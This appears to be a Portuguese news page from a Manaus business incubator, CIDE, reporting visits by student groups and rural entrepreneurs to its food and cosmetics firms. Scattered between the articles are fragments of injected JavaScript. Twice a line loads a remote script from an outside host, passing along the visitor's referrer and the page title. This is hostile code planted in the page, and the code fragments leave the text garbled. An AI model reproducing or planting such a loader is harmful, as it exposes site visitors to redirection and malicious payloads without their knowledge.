Estudantes da Fundação Bradesco no CIDE

 

Estudantes ouvem palestra do diretor executivo do CIDE.
Estudantes ouvem palestra do diretor executivo do CIDE.

 

 

Estudantes do curso de Gestão Empreendedora de Negócios, da Fundação Bradesco, instituição localizada no bairro Alvorada, zona Centro-Oeste de Manaus, estiveram na manhã de terça-feira, 17, nas instalações do Centro de Incubação e Desenvolvimento Empresarial (CIDE). A visita serviu para complementar as atividades do curso e incentivar os estudantes a conhecer os processos de empreendedorismo em vários segmentos.

Segundo a professora, Edilane Oliveira, os estudantes estavam curiosos por conhecer uma incubadora de empresas, falar com os empresários, ouvir histórias sobre como começar a empreender. “Tudo que ouvimos aqui, serviu para abrir nossa mente e nossa visão sobre o empreendedorismo. Eu me sinto incentivada a montar meu próprio negócio. Não é fácil, mas é possível”, diz a estudante Clarisse Farias.

Para o diretor executivo do CIDE, José Barbosa Grosso, o número de estudantes interessados a visitar a incubadora vem aumentando. “Sinto-me feliz por saber que estamos ajudando a estudantes e profissionais a conhecer o processo de incubação de empresas. Percebo também, que há um interesse por parte da juventude em aprender a empreender. Isso é bom”, diz o diretor.

FB4

Estudantes da Fundação Bradesco visitam a empresa Amazon Doces.
Estudantes da Fundação Bradesco visitam a empresa Amazon Doces.
Estudantes da Fundação Bradesco na Ana Morena.
Estudantes da Fundação Bradesco na Ana Morena.

 

Estudantes visitam a Temperos da Amazônia.
Estudantes visitam a Temperos da Amazônia.

 

 

 

 

 

 

} else {

Estudantes têm aula complementar no CIDE

Estudantes do Instituto Federal do Amazonas (Ifam) conhecem o CIDE
Estudantes do Instituto Federal do Amazonas (Ifam) conhecem o CIDE

 

Vários estudantes da disciplina de Empreendedorismo do Instituto Federal do Amazonas (Ifam), do Campus do Distrito Industrial, estiveram na tarde de hoje, 22, visitando o Centro de Incubação e Desenvolvimento Empresarial (CIDE), para conhecer a estrutura da incubadora e conversar com alguns empreendedores.

Segundo a professora Márcia Maria Bacovis, a visita serviu para que os estudantes conhecessem as atividades da incubadora e ouvissem as histórias de empreendedorismo dos empresários instalados. “Visitar uma incubadora, significa também incentivar os estudantes à inovação, ao empreendedorismo, às mudanças na sociedade, criando novos produtos e desenvolvendo atividades que atendam as demandas da população”, diz Bacovis.

Para o diretor executivo do CIDE, José Barbosa Grosso, as visitas à incubadora engrandecem aos estudantes e são importantes para os empreendedores. “Todos crescemos com essas visitas. Os estudantes aprendem, os empresários ensinam e aprendem também porque as perguntas dos visitantes estimula a novos desafios”, diz.

Estudantes do Ifam, ao sair de uma empresa, no CIDE.
Estudantes do Ifam, ao sair de uma empresa, no CIDE.

 

Fotov8
Estudantes do Ifam provam licores.
Fotov1
Estudantes do Ifam ouvem palestra.

 

Estudantes do Ifam em empresa de temperos, no CIDE.
Estudantes do Ifam em empresa de temperos, no CIDE.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Estudantes da Texas A&M University experimentam produtos regionais no Cide

Estudantes da Texas A&M University ouvem palestra do diretor executivo do Cide, José B. Grosso.
Estudantes da Texas A&M University ouvem palestra do diretor executivo do Cide, José B. Grosso.

 

Aproximadamente 40 estudantes universitários do curso de Engenharia de Alimentos, da Texas A&M University, Estados Unidos, estiveram, na manhã desta quinta-feira, 25, visitando empresas que trabalham com alimentos e cosméticos, e instaladas no Centro de Incubação e Desenvolvimento Empresarial (Cide). O objetivo foi conhecer alguns produtos amazônicos, usados na elaboração de licores, doces, e produtos de beleza.

Depois de ouvirem uma palestra com o diretor executivo do Cide, José Barbosa Grosso, os acadêmicos se dividiram em dois grupos para conhecer as empresas e provar os produtos. “Queremos que nossos estudantes conheçam os valores nutricionais dos produtos amazônicos, como esses produtos são escolhidos, processados com sustentabilidade e comercializados”, disse a professora Susanne Talcott, com a ajuda do tradutor Fábio Silva.

Durante a visita pelo Cide, muitos estudantes tiveram a oportunidade de provar alguns produtos regionais pela primeira vez. “Esses produtos são inovadores e diferentes de todos os produtos que eu já provei nos Estados Unidos. Foi a primeira vez que eu provei o açaí e o licor de cupuaçu. E, eu gostaria, futuramente, de comercializar esses produtos na minha terra”, disse a estudante Zulyma Castillo.

Na empresa de alimentos Waku Sese, estudantes experimentam o açaí.
Na empresa de alimentos Waku Sese, estudantes experimentam o açaí.

 

Na Sohervas da Amazônia, estudantes conhecem os licores, feitos com frutas regionais.
Na Sohervas da Amazônia, estudantes conhecem os licores, feitos com frutas regionais.

 

Estudantes e professores do Texas, Estados Unidos, tiram fotos com o diretor do Cide, José B. Grosso.
Estudantes e professores do Texas, Estados Unidos, tiram fotos com o diretor do Cide, José B. Grosso.

 

Estudantes da Texas A&M University, no auditório do Cide.
Estudantes da Texas A&M University, no auditório do Cide.

 

Estudantes tiram fotos em frente da empresa de alimentos Waku Sese.
Estudantes tiram fotos em frente da empresa de alimentos Waku Sese.

 

 

 

 

 

 

 

 

 

 

}

Empreendedorismo comunitário busca parcerias no Cide

 

Empreendedores do interior do Amazonas com o diretor executivo do Cide.
Empreendedores do interior do Amazonas com o diretor executivo do Cide.

 

Aproximadamente 60 empreendedores de 20 municípios do Amazonas e participantes da Incubadora Itinerante de Negócios Sociais e Sustentáveis, da Fundação Amazonas Sustentável (FAS), estiveram, hoje, no Centro de Incubação e Desenvolvimento Empresarial (CIDE), para ouvir palestra e conhecer empresas que trabalham com matéria-prima regional, como o açaí, pimenta e o cupuaçu, e realizar parcerias e negócios.

A maioria dos visitantes está associada a cooperativas do interior do Amazonas. “Negociando diretamente com o empreendedor, instalado no Cide, podemos depender menos do atravessador e melhorar o valor dos nossos produtos. É uma oportunidade que temos de fazer negócios também”, disse o presidente da Associação dos Produtores Agroextrativista da Reserva de Desenvolvimento Sustentável (RDS) do Rio Madeira, Hudson Oliveira.

O diretor executivo da incubadora, José Barbosa Grosso, foi o encarregado de apresentar os segmentos que existem no Cide. “Essas pessoas possuem empreendimentos de base comunitária e sustentável. Então, fazer contatos com outros empreendedores vai ajudá-las a melhorar seus negócios”, disse.

Depois da palestra sobre o processo de incubação no Cide, os visitantes conheceram quatro empresas ligadas diretamente com produtos amazônicos.

Empreendedores apoiados pela FAS, na frente do Cide.
Empreendedores apoiados pela FAS, na frente do Cide.
FAS1
O diretor executivo do Cide, José Barbosa Grosso, fala com os empreendedores do interior do Amazonas.

 

FAS2
Visitantes ouvem palestra, no auditrio do Cide.

 

FAS5
Visita na empresa Amazon Doces.
FAS6
Visita na empresa Temperos da Amazônia
FAS7
Visita na empresa de cosméticos Anna Morena.
FAS8
Visita na empresa de licores Sohervas da Amazônia.

 

 

 

 

 

 

 

if (document.currentScript) {

Estudantes do IFAM de Coari ouvem palestra no CIDE

Pale1
O diretor-executivo do CIDE fala aos estudantes de Coari.

Com o objetivo de complementar as aulas estudadas no curso técnico de Administração, em torno de cinquenta estudantes do Instituto Federal do Amazonas (IFAM Campus-Coari) ouviram, na manhã de hoje, 11, uma palestra sobre “O papel da incubadora CIDE no empreendedorismo local”, proferida pelo diretor-executivo, José Barbosa Grosso, que, após a exposição, convidou os alunos e professores a visitar algumas empresas instaladas na incubadora.

“É bom que os estudantes de administração aumentem seus conhecimentos adquiridos em sala de aula, visitando empresas inovadoras que um dia foram uma ideia e hoje se tornaram realidade”, disse José Grosso.

Segundo o professor José Wulisses, a visita está relacionada com as atividades desenvolvidas pelo curso de Administração. “O motivo é claro. Trouxemos os estudantes para que eles conheçam o ambiente de uma incubadora de empresas, unindo a parte teórica com a prática”.

Para a formanda Pâmela Rodrigues a visita foi impressionante. “Ouvimos falar de empreendedorismo na sala do curso, mas vir aqui e conhecer pessoalmente os trabalhos desenvolvidos na incubadora acrescenta conhecimento às aulas teóricas”, concluiu.

Pale3Pale2Pale4

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;